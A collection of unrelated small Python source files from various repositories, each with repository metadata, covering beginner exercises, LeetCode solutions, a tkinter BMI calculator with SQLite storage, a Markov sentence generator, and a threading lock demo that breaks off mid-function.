93593fc247c1b42f7cd1c0c0d83a7ad37ece1b75 | Luucius/python01 | /while.py | 71 | 3.703125 | 4 | numero = 0
while numero <= 10:
print(numero)
numero = numero+1 |
94a8ab107adbc26f00b1b35c5ed9ce73f76330a3 | UWSEDS/homework-3-4-testing-exceptions-and-coding-style-kfrankc | /dataframe.py | 859 | 3.71875 | 4 | import numpy as np
import pandas as pd
import sys
def validate(file_name):
df = pd.read_csv(file_name)
df_correct = pd.read_csv('data.csv')
try:
if (np.any(df_correct.dtypes != df.dtypes)):
raise ValueError()
except (ValueError):
print('Input DataFrame does not contain the correct data type.')
exit()
try:
if (sorted(list(df)) != sorted(list(df_correct))):
raise ValueError()
except (ValueError):
print('Input DataFrame does not contain the expected columns.')
exit()
try:
if len(df.index) < 1:
raise ValueError()
except (ValueError):
print("Input DataFrame does not have at least 1 row.")
exit()
print('Congratulations, input dataframe passes all checks.')
if __name__ == '__main__':
validate(sys.argv[1])
|
836659e3fa45b8341f2875e5cf577ac31b74841d | PhilKennedy86/DigitalCrafts-Assignments | /AlgorithymPracticeAssignmt3.py | 204 | 3.859375 | 4 | array = [0,1,2,3,4,5,6,7,8]
sum_array = 0
sum = 0
for i in range(0,10):
sum += i
for i in range(0,len(array)):
sum_array += array[i]
print("The number missing (0-9) is:")
print(sum - sum_array) |
564a34dbe481ac5c196648cd193f55d20af1f391 | coocos/leetcode | /leetcode/235_lowest_common_ancestor_of_a_binary_search_tree.py | 2,269 | 4.125 | 4 | import unittest
from leetcode.common import TreeNode
class Solution:
"""
This recursive solution utilizes the basic property of a binary search
tree to find the common ancestor. In a binary search tree the left
subtree of each node contains only values smaller than that particular
node and the right subtree contains values larger than that particular
node. Therefore, starting at the root, you can search for the first node
where the value is smaller than p but larger than q or vice versa. That
node will be the lowest common ancestor.
"""
def lowestCommonAncestor(self,
root: TreeNode,
p: TreeNode,
q: TreeNode) -> TreeNode:
# Node is larger than both nodes so the common ancestor has to be
# in the left subtree
if root.val > p.val and root.val > q.val:
return self.lowestCommonAncestor(root.left, p, q)
# Node is smaller than both nodes so the common ancestor has to be
# in the right subtree
if root.val < p.val and root.val < q.val:
return self.lowestCommonAncestor(root.right, p, q)
# Nodes are in distinct subtrees so this is the first common ancestor
return root
class TestSolution(unittest.TestCase):
def test_first_example(self):
root = TreeNode(6)
root.left = TreeNode(2)
root.left.left = TreeNode(0)
root.left.right = TreeNode(4)
root.left.right.left = TreeNode(3)
root.left.right.right = TreeNode(5)
root.right = TreeNode(8)
root.right.left = TreeNode(7)
root.right.right = TreeNode(9)
self.assertEqual(Solution().lowestCommonAncestor(root, root.left, root.right), root)
def test_second_example(self):
root = TreeNode(6)
root.left = TreeNode(2)
root.left.left = TreeNode(0)
root.left.right = TreeNode(4)
root.left.right.left = TreeNode(3)
root.left.right.right = TreeNode(5)
root.right = TreeNode(8)
root.right.left = TreeNode(7)
root.right.right = TreeNode(9)
self.assertEqual(Solution().lowestCommonAncestor(root, root.left, root.left.right), root.left)
|
1421699ac02298e6cbbc0526cdfc37d57fd60d81 | vitocuccovillo/DataScienceBook | /Chapter4/SomeMath.py | 637 | 3.578125 | 4 |
def jaccard(u1, u2):
in_common = len(u1 & u2)
union = len(u1 | u2)
return in_common/float(union)
if __name__ == '__main__':
'''
NOTAZIONE:
- liste: lista = ["a","a","b"]
- insieme: set = {"a","b"} senza ripetizioni
- no_duplic = set(lista) trasforma da lista a set
'''
countries = ["ita","ita","eng","eng","usa","fra","fra","lux"]
dist_countries = set(countries)
print(dist_countries)
# crea un dizionario, chiave:valore
dict = {"a":"nicola","b":"vito","c":"paola"}
print(dict["a"])
u1 = {"a","b","c","d"}
u2 = {"a","f","d"}
print(jaccard(u1,u2))
|
58f1195e56591f21ed98a36fcb9e683507ff901d | Kimberly07-Ernane/Python | /Pacote para dowloand/Python/ex001 (While) soma de n° pares e qtd de n° inferiores.py | 359 | 4.21875 | 4 | #Faça um programa que recebe dez números, calcule e mostre na tela:
# a soma dos números pares
# a quantidade de números inferiores a 10
#(com while)
soma=0
inf=0
i=0
while i < 10:
n=int(input('Digite um número:'))
if n %2==0:
soma+=n
if n<10:
inf+=1
i=i=1
print("Soma pares",soma)
print( "Quantidade de inferiores",inf)
|
dc72686255482255b890b5e793ed674be279cb58 | amirafzali/coding-questions | /2 Key Keyboard/sol.py | 435 | 3.6875 | 4 | def minSteps(self, n):
mem = {}
def search(current):
if current in mem: return mem[current]
if current == 1: return 0
shortest = float('inf')
for i in range(2,current+1):
if current%i == 0:
shortest = min(shortest, i+search(current/i))
mem[current] = shortest
return shortest
return search(n) |
6a55e72c0b4ff225a30e67e1ce4490f92703bade | prakashzph/test | /task_two.py | 229 | 3.59375 | 4 | from math import factorial
def total_route(n,k):
return factorial(n)/(factorial(k)*factorial(n-k))
print ('Hence, the total routes for 20*20 grid is '+str(total_route(40,20))) # n=20+20(since the grid is 20*20) and k = 20
|
5fe8aa8f932c9fe391c2d633299a92dc1ba5a22e | isemiguk/Python_Coursera | /Module_3/realNumbers.py | 733 | 4.21875 | 4 | print(float(2**100)) #пример преобразования в вещественное число
if 0.1 + 0.2 == 0.3: #это связано с представлением вещественных чисел в пайтоне
print('yes')
else:
print('no')
print('{0:.25f}'.format(0.1)) #пример указания вывода количества знаков после запятой
print(0.5.as_integer_ratio()) #пример хранения в виде дроби (числитель и знаменатель)
# пример сравнения вещественных чисел
x = float(input())
y = float(input())
epsilon = 10 ** -6
if abs(x - y) < epsilon:
print('yes')
else:
print('yes') |
55a7add24ddca32e4511760cc244b81e3f51d9da | KYOUNGSOO-LEE/project_euler | /Project_Euler(python)/PE21-30/PE27.py | 743 | 3.640625 | 4 | #PE27 Quadratic primes
import time
import math
def formula(n, a, b):
return n ** 2 + a * n + b
def isprime(n):
for i in range(2, math.floor(math.sqrt(abs(n))) + 1):
if n % i == 0:
return False
return True
startTime = time.time()
maxNum = 0
product = 0
aList = [num for num in range(-1000, 1001) if num % 2 == 1]
bList = [num for num in range(-1000, 1001) if isprime(num) is True]
for a in aList:
for b in bList:
n = 0
while(True):
if isprime(formula(n, a, b)) is False:
if n > maxNum:
maxNum = n
product = a * b
break
n += 1
print(maxNum, product)
print(time.time() - startTime, "seconds")
|
daff17f511c7aff195422a8efc96cc57e9865b2b | alkhalifas/Development-of-a-GUI-BMI-Calculator-using-Python-and-tkinter | /salkhali@bu.edu_Project/bmi_calculator_final.py | 7,053 | 3.65625 | 4 | # -*- coding: utf-8 -*-
"""
Created on Sat May 4 15:06:44 2019
@author: alkhalifas
"""
# Import packages:
# Import tkinter to build the GUI interface of this app:
from tkinter import *
# Import sqlite to store the data we will generate:
import sqlite3
# Import time to manage the time of our entries:
import time
import datetime
# import image to add BU logo:
from PIL import Image
from PIL import ImageTk, Image
# Connect to the SQL database and create a shortcut for easy access:
BMIDB = sqlite3.connect("bmidatabase.db")
c = BMIDB.cursor()
class Welcome():
def __init__ (self, master):
self.master = master
self.master.geometry('260x260+100+200')
self.master.title('Welcome')
self.master.configure(background='white')
import random
for x in range(10):
happycalc = random.randint(1,4)
happy = ['Amazing','Wonderful','Great','Awesome', 'Perfect']
happyword = happy[happycalc]
finalHappyText = "The " + happyword + " Boston University BMI Calculator"
#print(happyword)
self.label1 = Label(self.master, text = finalHappyText, fg='red', background = 'white').grid(row=1, column=1)
# img = ImageTk.PhotoImage(Image.open("bu1.png"))
# self.label2 = Label(self.master, image = img).grid(row=0, column=1)
today = datetime.datetime.now()
#print(today)
repr(today)
self.label3 = Label(self.master, text = today, fg='black', background = 'white').grid(row=8, column=1)
self.button1 = Button(self.master, text= "BMI Calculator", fg = 'blue', command = self.gotobmicalculator).grid(row=3, column=1)
self.button2 = Button(self.master, text = "Records", fg = 'blue', command = self.gotorecords).grid(row=5, column=1)
# self.button3 = Button(self.master, text = "Settings",fg='blue',command=self.gotosettings).grid(row=3,column=3)
self.button4 = Button(self.master, text = "Exit",fg='blue',command=self.exit).grid(row=7,column=1)
def exit(self):
# Create an exit
self.master.destroy()
def gotobmicalculator(self):
# The actual calcualtor
root2 = Toplevel(self.master)
myGUIO = bmicalculator(root2)
def gotorecords(self):
#This is where the previous records are stored
root2=Toplevel(self.master)
mygui=records(root2)
class bmicalculator():
#class created for the bmi calculator GUI
def __init__(self,master):
c.execute('CREATE TABLE IF NOT EXISTS BMIStorage(timestamp TEXT,bodymassindex REAL,weightclass TEXT)')
self.heightcm=DoubleVar()
self.weightkg=DoubleVar()
self.master=master
self.master.geometry('260x250+100+200')
self.master.title('BMI Calculator')
self.master.configure(background='white')
self.label2=Label(self.master,text='Welcome to the BMI Calculator',fg='red').grid(row=0,column=0)
self.label2=Label(self.master,text='Please enter your height in centimetres',fg='black').grid(row=3,column=0)
self.label2=Label(self.master,text='Please enter your weight in kilograms',fg='black').grid(row=4,column=0)
self.myheight=Entry(self.master,textvariable=self.heightcm).grid(row=3,column=1)
self.myweight=Entry(self.master,textvariable=self.weightkg).grid(row=4,column=1)
self.button4=Button(self.master,text="Calculate BMI",fg='blue',command=self.bmicalculation).grid(row=7,column=0)
self.button5=Button(self.master,text="Exit",fg='blue',command=self.exit).grid(row=9,column=0)
def bmicalculation(self):
bmiheight=self.heightcm.get()
bmiweight=self.weightkg.get()
bmi= float((bmiweight)/((bmiheight / 100)**2))
bmi = round(bmi, 4)
self.bmi = bmi
self.label1=Label(self.master,text='Your BMI is %.2f' % bmi).grid(row=5,column=0)
if bmi <= 18.5:
self.label2=Label(self.master,text='You are slightly underweight.',fg='blue').grid(row=6,column=0)
totalindex = 'underweight'
self.totalindex = totalindex
elif bmi >18.5 and bmi <25:
self.label3=Label(self.master,text='You are in the healthy weight group.',fg='green').grid(row=6,column=0)
totalindex = 'healthy'
self.totalindex = totalindex
elif bmi >= 25 and bmi < 30:
self.label4=Label(self.master,text='You are slightly overweight.',fg='orange').grid(row=6,column=0)
totalindex = 'overweight'
self.totalindex = totalindex
elif bmi >=30:
self.label5=Label(self.master,text='You are in the obese weight group.',fg='red').grid(row=6,column=0)
totalindex = 'obese'
self.totalindex = totalindex
if bmi >0 and bmi <999999999999999999999:
self.button6=Button(self.master,text="Store Data",fg='red',command=self.dynamic_data_entry).grid(row=8,column=0)
def dynamic_data_entry(self):
global dynamic_data_entry
timestamp = str(datetime.datetime.now().date())
bodymassindex = self.bmi
weightclass = self.totalindex
c.execute("INSERT INTO BMIStorage (timestamp, bodymassindex, weightclass) VALUES (?, ?, ?)",(timestamp, bodymassindex, weightclass))
BMIDB.commit()
self.writetodatabase()
def writetodatabase(self):
for i in range(1):
time.sleep(1)
def exit(self):
self.master.destroy()
class records():
def __init__(self,master):
self.master=master
self.master.geometry('500x500+100+200')
self.master.configure(background='white')
self.master.title('Records')
self.connection = sqlite3.connect('bmidatabase.db')
self.cur = self.connection.cursor()
self.dateLabel = Label(self.master, text="Date", width=10)
self.dateLabel.grid(row=0, column=0)
self.BMILabel = Label(self.master, text="BMI", width=10)
self.BMILabel.grid(row=0, column=1)
self.stateLabel = Label(self.master, text="Status", width=10)
self.stateLabel.grid(row=0, column=2)
self.showallrecords()
self.button4=Button(self.master,text="Return",fg='red',command=self.exit).grid(row=7,column=0)
def showallrecords(self):
data = self.readfromdatabase()
for index, dat in enumerate(data):
Label(self.master, text=dat[0]).grid(row=index+1, column=0)
Label(self.master, text=dat[1]).grid(row=index+1, column=1)
Label(self.master, text=dat[2]).grid(row=index+1, column=2)
def readfromdatabase(self):
self.cur.execute("SELECT * FROM BMIStorage")
return self.cur.fetchall()
def exit(self):
self.master.destroy()
def main():
root = Tk()
myGUIWelcome = Welcome(root)
root.mainloop()
if __name__ == '__main__':
main() |
4c7ae7979bd84acd065a36b1394463ef8ae5b05a | thakur-nishant/LeetCode | /818.RaceCar.py | 1,688 | 4.34375 | 4 | """
Your car starts at position 0 and speed +1 on an infinite number line. (Your car can go into negative positions.)
Your car drives automatically according to a sequence of instructions A (accelerate) and R (reverse).
When you get an instruction "A", your car does the following: position += speed, speed *= 2.
When you get an instruction "R", your car does the following: if your speed is positive then speed = -1 , otherwise speed = 1. (Your position stays the same.)
For example, after commands "AAR", your car goes to positions 0->1->3->3, and your speed goes to 1->2->4->-1.
Now for some target position, say the length of the shortest sequence of instructions to get there.
Example 1:
Input:
target = 3
Output: 2
Explanation:
The shortest instruction sequence is "AA".
Your position goes from 0->1->3.
Example 2:
Input:
target = 6
Output: 5
Explanation:
The shortest instruction sequence is "AAARA".
Your position goes from 0->1->3->7->7->6.
"""
import queue
class Solution:
def racecar(self, target: 'int') -> 'int':
q = queue.Queue()
q.put((0, 0, 1))
states = set()
while not q.empty():
dist, pos, speed = q.get()
if pos == target:
return dist
next_A = (dist + 1, pos + speed, speed * 2)
next_R = (dist + 1, pos, -1 if speed > 0 else 1)
if next_A[1:] not in states and target * 2 > next_A[1]:
states.add(next_A[1:])
q.put(next_A)
if next_R[1:] not in states and target * 2 > next_R[1]:
states.add(next_R[1:])
q.put(next_R)
target = 5478
print(Solution().racecar(target))
|
163286a8625a95612274c82209f4027b35a1dcef | YXChen512/LeetCode | /7_reverseString.py | 991 | 3.671875 | 4 | class Solution(object):
def __init__(self):
self.solution = None
def reverse(self, x):
"""
:type x: int32
:rtype: int32
"""
if x == 0:
return x
isNegative = x < 0
value = abs(x)
digits = []
while value >0:
digits.append(value % 10)
value = value / 10
m = len(digits)
digits = digits[::-1]
reverse = 0
# type(reverse) = int32
for i in range(m):
reverse += digits[i] * 10**i
if isNegative:
if reverse >2**31:
print("Overflowed!")
return 0
else:
return (-1)*reverse
else: # input is positive
if reverse > (2**31 -1):
print('Overflowed')
return 0
else:
return reverse
s = Solution()
s.solution = s.reverse(-2000000992)
#print(2**31)
print(s.solution)
|
8675c6f941a0cdf4fef1dccb5e551bef45016e5c | MalwiB/academic-projects | /Algorithms_Data_Structures_Python/4/4.6.py | 314 | 3.578125 | 4 | def sum_seq(sequence):
suma = 0
for item in sequence:
if isinstance(item, (list, tuple)):
suma += sum_seq(item)
else:
suma += item
return suma
seq = [ [1,2,3,4], 1, 2, [6, 7], 1, [1, [6, 2, 3], (2, 3, 4)]]
print seq
print "\nSuma liczb w powyzszej sekwencji zagniezdzonej wynosi",
print sum_seq(seq) |
04b4c895efad5e538370dccd756fc252466ea4d1 | scorp6969/Python-Tutorial | /variable/string_methods.py | 570 | 4.09375 | 4 | name = 'rambo rocky'
n = 'ramborocky'
name2 = 'RAMBO ROCKY'
# find length of string
print(len(name))
# find any character in string
print(name.find('m'))
# capitalize the string
print(name.capitalize())
# make all character uppercase
print(name.upper())
# make all character lowercase
print(name2.lower())
# check whether string contains digit or not
print(name.isdigit())
# check whether string contains alphabet or not
print(n.isalpha())
# count any character in string
print(name.count('o'))
# replace any character with another character
print(name.replace('o', 'i')) |
96e166ac2b0f611583b62da6564fda03fdeb088d | feuer95/Thesis | /Python/LPF_graph.py | 270 | 3.796875 | 4 | # -*- coding: utf-8 -*-
"""
Created on Tue Jul 16 10:59:53 2019
@author: elena
"""
import matplotlib.pyplot as plt
import numpy as np
x = np.linspace(0,10)
plt.plot(x, x, c = 'black')
plt.plot(x, 5 * x,c = 'black')
plt.plot(x, 0.30 * x,c = 'black')
plt.show() |
05c49d05ee024731921a84e51520bdb12a422e73 | simonryu/python_study | /예제 소스 코드/04교시/미니문법/if_sample.py | 58 | 3.53125 | 4 | for i in range(1, 4):
if i == 3:
print(i)
|
b794d62d8c26efb939a30351d5c8d5ce85ce9822 | simonaculda/LeetCode | /Array_and_Strings/reverseWordInS3.py | 930 | 4.25 | 4 | """
Given a string, you need to reverse the order of characters in each word within a sentence while
still preserving whitespace and initial word order.
Example 1:
Input: "Let's take LeetCode contest"
Output: "s'teL ekat edoCteeL tsetnoc"
Note: In the string, each word is separated by single space and there will not be any extra space in the string.
https://leetcode.com/problems/reverse-words-in-a-string-iii/
"""
def reverseWords(s):
"""
:param s: str
:return: str
"""
list_words = s.split()
for i in range(len(list_words)):
list_words[i] = list_words[i][::-1]
return ' '.join(list_words)
def test():
assert reverseWords("Let's take LeetCode contest") == "s'teL ekat edoCteeL tsetnoc"
assert reverseWords("Hello word") == "olleH drow"
assert reverseWords("") == ""
assert reverseWords("Hi") == "iH"
if __name__ == '__main__':
test()
|
8a2575392496745623b60b92d88e5ef4965884ae | sdanil-ops/stepik-beegeek-python | /week2/task26.py | 1,249 | 3.84375 | 4 | # -----------------------------------------------------------
# Copyright (c) 2021. Danil Smirnov
# program for converting the value of the time interval
# specified in minutes into the value expressed
# in hours and minutes.
# -----------------------------------------------------------
from task1 import TestUnit
class TimeInterval:
def __init__(self, minutes: int):
self.minutes = minutes
self.complete_hours = self.get_complete_hours()
self.rest_minutes = self.get_rest_minutes()
def get_complete_hours(self):
"""returns the number of complete hours"""
return self.minutes // 60
def get_rest_minutes(self):
"""returns the number of minutes remaining"""
return self.minutes % 60
def __repr__(self):
return f'{self.minutes} мин - это {self.complete_hours} час {self.rest_minutes} минут.'
# ------------- testing -------------
if __name__ == '__main__':
test = TestUnit(TimeInterval, 150, '150 мин - это 2 час 30 минут.')
print('passed' if test.is_passed else 'failed')
# ------------- running -------------
# if __name__ == '__main__':
# time_interval = TimeInterval(int(input()))
# print(time_interval)
|
db185c77d0e2b15393a1a5ef086f53b34ed76525 | MattCotton20/Battleships | /random_guessing.py | 609 | 3.578125 | 4 | from battleships import *
def random_guessing(size, ships, print_output):
board = generate_board(size, ships, False)
if print_output:
board.draw_board(False)
while not board.game_over:
# Take a random guess
guess = board.get_random_pos()
valid_guess, _, _ = board.take_guess(guess, print_output)
# Display output if required
if valid_guess and print_output:
board.draw_board(False)
print("Guess: %s" % (pos_to_code(guess)))
return board.guesses
if __name__ == '__main__':
random_guessing(10, STD_SHIPS, True)
|
391fe3fde5c5ed7e4fdf1c6845738eb898a75bdf | louizcerca/python | /immc.py | 1,873 | 3.765625 | 4 | # python 2.7.12
peso = float(input('Insira o peso: '))
print(peso)
altura = float(input('Insira a altura: '))
print(altura)
imc = (peso / (altura * altura))
ideal1 = ((altura * altura) * 18.52)
ideal2 = ((altura * altura) * 24.97)
perda1 = round(peso - ideal2)
perda2 = round(peso - ideal1)
pideal1 = round(ideal1)
pideal2 = round(ideal2)
print('Seu IMC e:', round(imc, 2))
if imc < 16.99:
print('Muito abaixo do peso')
print('Voce necessitaria ganhar aproximadamente entre', round(ideal1 - peso), 'e', round(ideal2 - peso), 'kg para atingir o peso ideal(', pideal1, 'e', pideal2, 'kg)')
elif 17.0 < imc < 18.49:
print('Abaixo do peso')
print('Voce necessitaria ganhar aproximadamente entre', round(ideal1 - peso), 'e', round(ideal2 - peso),
'kg para atingir o peso ideal(', pideal1, 'e', pideal2, 'kg)')
elif 18.5 < imc < 24.99:
print('Parabens, voce esta no peso ideal')
elif 25.0 < imc < 29.99:
print('Voce esta acima do peso')
print('Voce necessitaria perder aproximadamente entre', perda1, 'e', perda2,
'kg para atingir o peso ideal(', pideal1, 'kg e', pideal2, 'kg)')
elif 30.0 < imc < 34.99:
print('Voce esta com Obesidade Grau I')
print('Voce necessitaria perder aproximadamente entre', perda1, 'e', perda2,
'kg para atingir o peso ideal(', pideal1, 'kg e', pideal2, 'kg)')
elif 35.00 < imc < 39.99:
print('Voce esta com Obesidade Grau II (Severa)')
print('Voce necessitaria perder aproximadamente entre', perda1, 'e', perda2,
'kg para atingir o peso ideal(', pideal1, 'kg e', pideal2, 'kg)')
elif imc > 40:
print('Voce esta com Obesidade Grau III (Morbida)')
print('Voce necessitaria perder aproximadamente entre', perda1, 'e', perda2,
'kg para atingir o peso ideal(', pideal1, 'kg e', pideal2, 'kg)')
|
60a4d2399b0b29de99247fa29f78f59ad804a787 | mukulb90/datastructure | /dynamic_programming/longest_increasing_subsequence.py | 698 | 3.921875 | 4 | def _longest_increasing_subsequence(arr, end):
cost = [1 for item in arr];
for outer in range(1, end + 1):
max_so_far = cost[0];
for inner in range(0, outer):
# lis till inner -> cost[inner]
if(arr[inner] < arr[outer]):
max_so_far = max([cost[inner] + 1, max_so_far])
cost[outer] = max_so_far;
return cost[end];
def longest_increasing_subsequence(arr):
return _longest_increasing_subsequence(arr, len(arr) - 1);
def main():
input = '10, 9, 2, 5, 3, 7, 101, 18'
#
values = [int(item) for item in input.split(', ')]
print(longest_increasing_subsequence(values));
if __name__ == '__main__':
main()
|
b7d94637e17b45fb36bdde04fb4daf1ad3fd1e0c | vnyk/prg | /scopeElementsSum.py | 1,491 | 4.125 | 4 | """
The absolute difference between two integers, and , is written as . The maximum absolute difference between two integers in a set of positive integers, , is the largest absolute difference between any two integers in .
The Difference class is started for you in the editor. It has a private integer array () for storing non-negative integers, and a public integer () for storing the maximum absolute difference.
Task
Complete the Difference class by writing the following:
A class constructor that takes an array of integers as a parameter and saves it to the instance variable.
A computeDifference method that finds the maximum absolute difference between any numbers in and stores it in the
maximumDifference instance variable.
Constraints
, where
Output Format
You are not responsible for printing any output; the Solution class will print the value of the instance variable.
"""
class Difference:
def __init__(self, a):
self.__elements = a
# Add your code here
def computeDifference(self):
#self.maximumDifference = max(abs(a[i]-a[i+1]) for i in range(len(a)-1))
self.maximumDifference = max(a)-min(a)
return(self.maximumDifference)
# End of Difference class
_ = input()
a = [int(e) for e in input().split(' ')]
d = Difference(a)
d.computeDifference()
print(d.maximumDifference)
''' ======================RESULT=================='''
Input (stdin)Download
3
1 2 5
Expected OutputDownload
4
|
68da17c34eb663ae956eb9e86f25021997ea7350 | eduhmc/CS61A | /Teoria/Class Code/32.py | 742 | 4.03125 | 4 | ### DEMO1: sum_primes python O(1) vs scheme O(n)
def is_prime(x):
"""Return whether x is prime.
>>> [is_prime(x) for x in range(1, 10)]
[False, True, True, False, True, False, True, False, False]
"""
if x <= 1:
return False
else:
return all(map(lambda y: x % y, range(2, x)))
def sum_primes(a, b):
"""Sum all primes in the interval range(a, b).
>>> sum_primes(1, 10)
17
"""
total = 0
x = a
while x < b:
if is_prime(x):
total = total + x
x = x + 1
return total
def sum_primes_filter(a, b):
"""Sum all primes in the interval range(a, b).
>>> sum_primes(1, 10)
17
"""
return sum(filter(is_prime, range(a, b)))
|
d17206461651c5113b101a69e4ea5c0fc308c871 | shreyassk18/MyPyCharmProject | /DataType/Strings/String_immutable.py | 413 | 4.09375 | 4 | #Strings are immutable, which means address of the variable will be changed when you modify the variable
#memory of a variable can be found using id() funtion
str1 = "name"
str2 = "organization"
print(id(str1)) #1758994627248
print(id(str2)) #1759026452144
str2=str2 + "onmobile"
print(id(str1)) #1758994627248
print(id(str2)) #1759026457672 #so this variable address got changed as we have changed the value |
b2b6592381386761dd512a2e75373009d8a0fecf | gestone/TechGen | /sentence_generator.py | 4,121 | 3.875 | 4 | """
Generates random sentences using Markov Models.
"""
import psycopg2
import random
import re
import os
from nltk import bigrams # to get tuples from a sentence in the form: (s0, s1), (s1, s2)
class SentenceGenerator(object):
"""
Generates random sentences. Since SentenceGenerator is
implemented using a Markov Model, input data must first
be put in to train the model before being able to generate
sentences.
"""
def __init__(self, classifier, logger):
"""
Constructs a new instance of SentenceGenerator with
an untrained Markov Model.
"""
self.model = {}
self.classifier = classifier
self.logger = logger
self._train_model()
@classmethod
def _is_end_word(cls, word):
"""
Checks to see if the word is a terminal word,
true if so, false otherwise.
"""
return bool(re.match(r"\w+[:.?!*\\-]+", word))
def train_model(self, input_data):
"""
Trains the model with input_data, a simple space seperated
English sentence(s). If the last sentence or phrase does not
contain ending punctuation, a "." will be appended to the last
word contained.
"""
self.logger.debug("Training generator on '%s' " % input_data)
split_data = input_data.split()
# Clean the input and make sure that the last element
# has some form of punctuation, if not, append '.'.
if split_data and not SentenceGenerator._is_end_word(split_data[-1]):
split_data[-1] += "."
# bigrams returns -> [(s0, s1), (s1, s2)...]
# where each s_i is a word
markov_states = bigrams(split_data)
for init_state, pos_state in markov_states:
all_pos_states = self.model.get(init_state, [])
all_pos_states.append(pos_state)
self.model[init_state] = all_pos_states
def _train_model(self):
"""
Trains the model with the results back from the Postgres database.
"""
res = self._query_data()
for phrase in res:
self.train_model(phrase[0])
def generate_sentence(self, initial_word=None):
"""
Randomly generates a sentence with an initial word. If no initial
word is specified, a random word will be chosen as the start word.
"""
if initial_word:
# verify that its in the dictionary
if initial_word not in self.model:
raise ValueError("\'" + initial_word + "\' was not found")
cur_state = initial_word
else:
cur_state = random.choice(self.model.keys())
# try generating a sentence 10000 times, if not possible, return err msg
for _ in xrange(10000):
cur_sentence = []
cur_sentence.append(cur_state)
while not self._is_end_word(cur_state) and cur_state in self.model.keys():
# get all possible states and randomly choose a state to go to
all_future_states = self.model[cur_state]
cur_state = random.choice(all_future_states)
cur_sentence.append(cur_state)
# finished generating a sentence, generate a new state if not passed one
cur_state = initial_word if initial_word else random.choice(self.model.keys())
full_sentence = " ".join(cur_sentence)
if self.classifier.classify(full_sentence):
self.logger.debug("Successfully generated a sentence!")
return full_sentence
return "Error could not generate sentence."
def _query_data(self):
"""
Queries the phrases to be trained on from the PostgresDB.
"""
self.logger.debug("Querying phrases from the DB...")
conn = psycopg2.connect(database=os.environ["DATABASE"], user=os.environ["USER"])
cur = conn.cursor()
cur.execute("SELECT phrase FROM phrases ORDER BY fetch_date DESC")
self.logger.debug("Success, returning results")
return iter(cur.fetchall())
|
ed613433eaa50d87afe31c8a9a97f737545e666d | andyleva/kurs-python | /lesson01-hw6.py | 1,358 | 4.03125 | 4 | # 6. Спортсмен занимается ежедневными пробежками. В первый день его результат составил a
# километров. Каждый день спортсмен увеличивал результат на 10% относительно
# предыдущего. Требуется определить номер дня, на который результат спортсмена составит
# не менее b километров. Программа должна принимать значения параметров a и b и выводить
# одно натуральное число — номер дня.
# Например: a = 2, b = 3.
# Результат:
# Ответ: на шестой день спортсмен достиг результата — не менее 3 км
a = int(input("Введите значение a - пробежка в первый день:"))
b = int(input("Введите значение b - требуемый конечный размер пробежки в день:"))
i = 1
print(f"{i} - й день: {a}")
while a <= b:
a += a * 0.1
i += 1
print(f"{i} - й день: {a:.2f}")
print(f"Ответ: на {i}-й день спортсмен достиг результата - не менее {b} км")
|
59e0d0a11e668484d9a821e73084131f4d48d3b2 | SeanHarveyOfiangga/Assignment-1 | /test.py | 168 | 3.9375 | 4 | """ Basic Addition Calculator """
a = int(input("Enter your first number: "))
b = int(input("Enter your second number: "))
result = a + b
print(f"{a} + {b} = {result}") |
eec25dd6059841bd877644950a313cd11c5ddab2 | RavikrianGoru/py_durga | /byte_of_python/py_oop/inheritance_subclass.py | 1,682 | 4.375 | 4 | class SchoolMember:
'''Represents any school memers. base/super class'''
def __init__(self, name, age):
self.name = name
self.age = age
print(f'Initializing SchoolMember: {self.name}')
def details(self):
print(f'Details Name : {self.name}, Age : {self.age}', end=" ")
class Teacher(SchoolMember):
'''Represents any teacher. child/sub class'''
def __init__(self, name, age , sal):
# Python does not automatically call the constructor of the base class. have to call explicitly
SchoolMember.__init__(self, name, age) # calling base class constructor/__init__
self.sal = sal
print(f'Initializing Teacher: {self.name}')
def details(self):
SchoolMember.details(self)
print(f'Salary : {self.sal}', end=" ")
class Student(SchoolMember):
'''Represents any Student. child/sub'''
def __init__(self, name, age, marks):
# Python does not automatically call the constructor of the base class. have to call explicitly
SchoolMember.__init__(self, name, age) # calling base class constructor/__init__
self.marks = marks
print(f'Initializing Student: {self.name}')
def details(self):
SchoolMember.details(self)
print(f'Marks : {self.marks}', end=" ")
def main():
t1 = Teacher('Mr. Madhu', 35, 35000.00)
t2 = Teacher('Mss. Lakshmi', 32, 34000.00)
s1 = Student('Ravi', 26, 75)
s2 = Student('Kiran', 25, 77)
s3 = Student('Devi', 24, 79)
l = [t1,t2,s1,s2,s3]
for each in l:
each.details() # this is common method for Teacher and Student
print()
if __name__ == '__main__':
main() |
5974ad8fbaf5927bdfab41b0cb3b16c9d56ad86c | ishantk/KnowledgeHutHMS2020 | /Session4R.py | 2,855 | 4.09375 | 4 | """
Synchronization
"""
import time
import threading
# create a Lock Object
lock = threading.Lock()
class MovieTicket:
def __init__(self, name, time, row, seat_num):
self.name = name
self.time = time
self.row = row
self.seat_num = seat_num
self.is_booked = False
def book_movie_ticket(self):
if self.is_booked:
print(".........")
else:
self.is_booked = True
print("~~~~~~~~~~~~~~")
print("Ticket Details")
print("{} | {}".format(self.name, self.time))
print("{} | {}".format(self.row, self.seat_num))
print("~~~~~~~~~~~~~~")
def pay(self, email):
self.email = email
if self.is_booked:
print("Sorry {}, Ticket {} | {} is UNAVAILABLE".format(self.email, self.row, self.seat_num))
else:
print("{}, Please Pay for Your Movie Ticket {} | {}".format(self.email, self.row, self.seat_num))
time.sleep(5) # sleep is for transaction taking 5 seconds :)
print("Thank You {}. We have booked your Ticket {} | {} and sent the email".format(self.email, self.row, self.seat_num))
def __str__(self):
return "{} | {} | {} | {}".format(self.name, self.time, self.row, self.seat_num)
class BookMovieTicketTask(threading.Thread):
def select_seat(self, ticket, email):
self.ticket = ticket
self.email = email
def run(self):
lock.acquire()
self.ticket.pay(email=self.email)
self.ticket.book_movie_ticket()
lock.release()
def main():
"""
ticket1 = MovieTicket(name="Avengers", time="20:00", row="A", seat_num=1)
ticket2 = MovieTicket(name="Avengers", time="20:00", row="A", seat_num=2)
ticket3 = MovieTicket(name="Avengers", time="20:00", row="A", seat_num=3)
ticket4 = MovieTicket(name="Avengers", time="20:00", row="A", seat_num=4)
ticket5 = MovieTicket(name="Avengers", time="20:00", row="A", seat_num=5)
ticket6 = MovieTicket(name="Avengers", time="20:00", row="A", seat_num=6)
ticket7 = MovieTicket(name="Avengers", time="20:00", row="A", seat_num=7)
ticket8 = MovieTicket(name="Avengers", time="20:00", row="A", seat_num=8)
ticket9 = MovieTicket(name="Avengers", time="20:00", row="A", seat_num=9)
